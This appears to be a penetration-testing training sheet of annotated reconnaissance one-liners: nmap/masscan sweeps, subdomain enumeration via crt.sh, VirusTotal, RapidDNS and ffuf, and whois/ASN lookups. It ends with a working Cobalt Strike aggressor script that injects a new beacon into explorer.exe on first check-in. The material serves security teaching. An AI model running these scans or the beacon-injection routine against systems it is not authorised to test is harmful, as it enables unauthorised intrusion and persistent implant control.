等保培训
信息收集小脚本
# Host discovery only (-sn: no port scan) on the target /24; the report is
# saved so the next line can parse the live addresses out of it.
target_net=172.29.130.0/24
nmap -sn "$target_net" > nmap-ip.txt
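# Pull the live hosts out of the nmap report. The address is the last field of
# each "Nmap scan report for ..." line; it is wrapped in parentheses only when
# reverse DNS produced a hostname, so strip the parens rather than relying on a
# fixed field position (the original `cut -d " " -f6` returned an empty line
# for every host without a hostname).
# $1: nmap output file (default nmap-ip.txt); prints one IP per line.
nmap_live_ips() {
  grep 'Nmap scan report for' "${1:-nmap-ip.txt}" \
    | awk '{gsub(/[()]/, "", $NF); print $NF}'
}
nmap_live_ips > ip.txt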
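# Port-scan the hosts found above. The original only printed to the terminal,
# while the two lines below read masscan-ip.txt, so tee the output into that
# file (keeping the default "Discovered open port 80/tcp on 10.0.0.1" lines
# that the parsers below expect; -oL would change the format).
# --rate 10000 is aggressive for a production network; lower it where needed.
sudo masscan -iL ip.txt --rate 10000 -p1-65535 --only-open | tee masscan-ip.txt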
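# Unique hosts with at least one open TCP port, taken from the masscan output
# ("Discovered open port 80/tcp on 10.0.0.1" -> 10.0.0.1; a trailing ':' as
# printed on banner lines is removed). The original sorted on the 4th octet
# only, so 10.0.1.9 came before 10.0.0.20; sort on all four octets instead.
# $1: masscan output file (default masscan-ip.txt); prints one IP per line.
masscan_ips() {
  awk '/tcp/ {sub(/:$/, "", $6); print $6}' "${1:-masscan-ip.txt}" \
    | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n -u
}
masscan_ips > ip.txt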
# Unique open TCP ports from the masscan output, sorted numerically
# ("Discovered open port 80/tcp on 10.0.0.1" -> 80). Splitting on both
# space and '/' puts the port number in the 4th field directly.
awk -F'[ /]' '/tcp/ {print $4}' masscan-ip.txt | sort -n | uniq > port.txt
# Collapse each IP in ip.txt to its /24 (192.168.1.x -> 192.168.1.0/24); the
# first two cuts drop anything after a space or ':' (e.g. a port suffix).
# Output is one line per input line, so the same /24 may repeat.
cut -d ' ' -f1 ip.txt | cut -d : -f1 | cut -d . -f1-3 | sed 's#$#.0/24#'
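# Prefix each IP in ip.txt with a scheme (192.168.1.5 -> http://192.168.1.5),
# dropping anything after a space or ':' first. The original also ran
# `cut -d . -f1,2,3` (copied from the /24 line above), which threw away the
# last octet and produced http://192.168.1 instead of the documented result.
# $1: input file (default ip.txt); prints one URL per line.
ip_to_url() {
  cut -d ' ' -f1 "${1:-ip.txt}" | cut -d : -f1 | sed 's#^#http://#'
}
ip_to_url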
REM Windows cmd.exe: ping every host of 192.168.1.0/24 once (2 s timeout) to see which answer.
REM Typed at the prompt the loop variable is %i; inside a .bat file it must be written %%i.
for /L %i in (1,1,254) do ping -n 1 -w 2 192.168.1.%i
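# Candidate gateway addresses for the private ranges: print the ".1" of every
# /24, then probe those to learn which /24s are actually in use.
# 10.0.0.0/8 -> 10.0.0.1 .. 10.255.255.1 (65536 lines). The original loops ran
# 1..255 and so skipped every 10.0.x.1 and 10.x.0.1, including 10.0.0.1.
gen_gateways_10() {
  # brace expansion varies the left-most range slowest, like the nested loop did
  printf '%s\n' 10.{0..255}.{0..255}.1
}
gen_gateways_10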
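# 172.16.0.0/12 -> 172.16.0.1 .. 172.31.255.1 (4096 lines), the ".1" of every
# /24. The original inner loop ran 1..255 and so skipped every 172.x.0.1.
gen_gateways_172() {
  # brace expansion varies the left-most range slowest, like the nested loop did
  printf '%s\n' 172.{16..31}.{0..255}.1
}
gen_gateways_172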
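# 192.168.0.0/16 -> 192.168.0.1 .. 192.168.255.1 (256 lines), the ".1" of every
# /24. The original wrote `{1.255}` (a dot instead of `..`), which bash does not
# expand, so it printed the literal string "192.168.{1.255}.1" once; it also
# would have skipped 192.168.0.1.
gen_gateways_192() {
  printf '%s\n' 192.168.{0..255}.1
}
gen_gateways_192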
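# credit: @steve_mcilwain
# For each domain listed in the input file, resolve its A records and print the
# CIDR and Organization whois lines of every address, joined into one line per
# domain (as the original `echo $(...)` did). The original was split across two
# lines in the middle of `done` and used unquoted $DOMAIN/$ip.
# $1: file with one domain per line (default domains.txt).
whois_domain_ranges() {
  local domain ip words
  while IFS= read -r domain || [[ -n "$domain" ]]; do
    [[ -n "$domain" ]] || continue
    # word-split the inner output on purpose: one line per domain, as before
    # shellcheck disable=SC2046,SC2207
    words=( $(for ip in $(dig a "$domain" +short); do
                whois "$ip" | grep -e CIDR -e Organization | tr -s ' ' | paste - -
              done | uniq) )
    printf '%s\n' "${words[*]}"
  done < "${1:-domains.txt}"
}
whois_domain_ranges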
# credit: @andirrahmani1
# Subdomain listing from RapidDNS.io; $1 is the root domain. The result page
# is scraped as HTML (the href of each "<td><a" cell), so this breaks whenever
# the site's markup changes.
domain=$1
curl -s "https://rapiddns.io/subdomain/${domain}?full=1#result" \
  | grep '<td><a' \
  | cut -d '"' -f2 \
  | grep http \
  | cut -d / -f3 \
  | sed 's/#results//g' \
  | sort -u
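# credit: @pikpikcu
# Subdomains from VirusTotal's web UI endpoint. The domain is now taken from
# $1 (defaulting to the original placeholder domain.com) instead of being
# hard-coded. grep -P (PCRE) is GNU grep only.
# The original character class [A-z] also spans the punctuation between 'Z'
# and 'a' ([ \ ] ^ _ `), so it is narrowed to [A-Za-z].
domain=${1:-domain.com}
curl -s "https://www.virustotal.com/ui/domains/${domain}/subdomains?limit=40" \
  | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-Za-z]))\w+" \
  | sort -u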
# credit: @vict0ni
# Subdomains from Certificate Transparency logs via crt.sh's JSON output;
# $1 is the root domain (%25 is a URL-encoded '%' wildcard). Wildcard names
# such as *.example.com are reduced to their base name before de-duplication.
root=$1
curl -s "https://crt.sh/?q=%25.${root}&output=json" \
  | jq -r '.[].name_value' \
  | sed 's/\*\.//g' \
  | sort -u
# credit: @GochaOqradze
# Subdomain brute force with ffuf: each wordlist entry replaces FUZZ in the
# URL. -v makes ffuf print "| URL | https://..." lines, and the 4th
# whitespace-separated field of those is the URL. Replace "rootdomain" first.
wordlist=jhaddixall.txt
ffuf -u https://FUZZ.rootdomain -w "$wordlist" -v \
  | grep '| URL |' \
  | awk '{print $4}'
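# credit: wains.be
# Route objects registered in RADb for the origin ASN of an IP address ($1):
# first look up the address's origin ASN, then list that ASN's routes.
# The original inlined the first lookup unquoted; when it returned nothing the
# second whois ran with no argument. Stop with a message instead.
# Prints one prefix per line, numerically sorted on the leading octet.
asn_routes() {
  local asn
  asn=$(whois -h whois.radb.net "$1" | awk '/origin:/ {print $NF; exit}')
  if [[ -z "$asn" ]]; then
    printf 'no origin ASN found in RADb for %s\n' "$1" >&2
    return 1
  fi
  whois -h whois.radb.net -i origin -T route "$asn" \
    | awk '/^route:/ {print $NF}' \
    | sort -n
}
asn_routes "$1"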
# credit: @emenalf
# Print every dotted-quad IPv4 address found in file.txt, one per line. Each
# octet is limited to 0-255, so 999.1.1.1 is not matched; there is no word
# boundary, so a match may start inside a longer digit run.
octet='(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
grep -E -o "${octet}\.${octet}\.${octet}\.${octet}" file.txt
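# credit: @tomnomnom
# Build a wordlist from a site's known URLs: query-string keys plus every path
# segment, with static-asset extensions stripped, appended to wordlist.txt.
# Pass the domain as $1 (defaults to the original placeholder domain.com).
# Fixes over the original one-liner: gau was run twice; the temporary ends.txt
# was removed with `rm ends.txt | sed -i ...` (a pipe that only worked because
# sed -i ignores stdin); the `\|` alternation is GNU-only, so the extension
# list is an ERE now; empty segments and duplicates are dropped. ".woff" is
# added next to the original ".wolf", which looks like a typo for the web-font
# extension. Nothing is echoed to the terminal any more.
build_wordlist() {
  local target=${1:-domain.com} urls
  urls=$(gau "$target") || return
  {
    unfurl -u keys <<<"$urls"
    unfurl -u paths <<<"$urls" | tr '/' '\n'
  } | sed -E 's/\.(css|png|jpeg|jpg|svg|gif|wolf|woff|bmp)//g' \
    | awk 'NF' \
    | sort -u >> wordlist.txt
}
build_wordlist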
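# credit: @rez0__
# Virtual-host discovery: keep the URL fixed and fuzz the Host header.
# The original had a stray space in "https://target .com", which made the URL
# invalid; "target.com" here is a placeholder for the real host.
ffuf -c -u https://target.com -H 'Host: FUZZ' -w vhost_wordlist.txt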
# credit: @laughface809
# Pull the URLs/endpoints embedded in an Android package.
apk_path=path/to/file.apk
apkurlgrep -a "$apk_path"
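# credit: @laughface809
# Hostnames for a list of IPs with HostHunter; the input file is a positional
# argument. The original wrote it as <target-ips.txt>, and in a shell the
# angle brackets are redirections ("> >" is a syntax error), so the line could
# not run as written.
python3 hosthunter.py target-ips.txt > vhosts.txt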
# Original header (translated): "set the callback interval to 1 s, then
# immediately migrate the process into explorer".
# NOTE(review): nothing in this block changes the sleep interval -- there is
# no sleep call below; only the migration half is implemented.
# What the code does: when a beacon first checks in it requests a process
# list, and the callback injects a new beacon for listener "domain" into
# explorer.exe. From a detection standpoint this is the familiar pattern of a
# fresh implant immediately injecting into a long-lived desktop process.
on beacon_initial{
# Handler for the process-list output requested by bps below
# ($1 = beacon id, $2 = the listing text).
sub callback
{
# Matches the explorer.exe row of the tab-separated listing and captures the
# second number after the name. NOTE(review): which column that is (pid vs.
# ppid) is not visible here -- check against the bps output format.
$regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
# Hard-coded listener name for the injected beacon.
$listener = "domain";
# NOTE(review): written with no space between $2 and ismatch; looks like a typo.
if ($2ismatch $regex){
# matched() holds the capture groups; index 1 is the second group.
$pid = matched()[1];
# Kept in a global so the check at the bottom can skip re-injection.
$inject_pid = $pid;
# Payload architecture follows the calling beacon's.
if (-is64 $1) {
$arch = "x64";
} else {
$arch = "x86";
}
binject($1, $pid, $listener, $arch);
}
}
# Only request the process list when this beacon is not itself the one last
# injected into; otherwise the new beacon inside explorer.exe would migrate
# again. $inject_pid is set by the callback when the listing arrives, so on the
# very first beacon it is still unset.
if($inject_pid != beacon_info($1,"pid")) {
bps($1, &callback);
}
}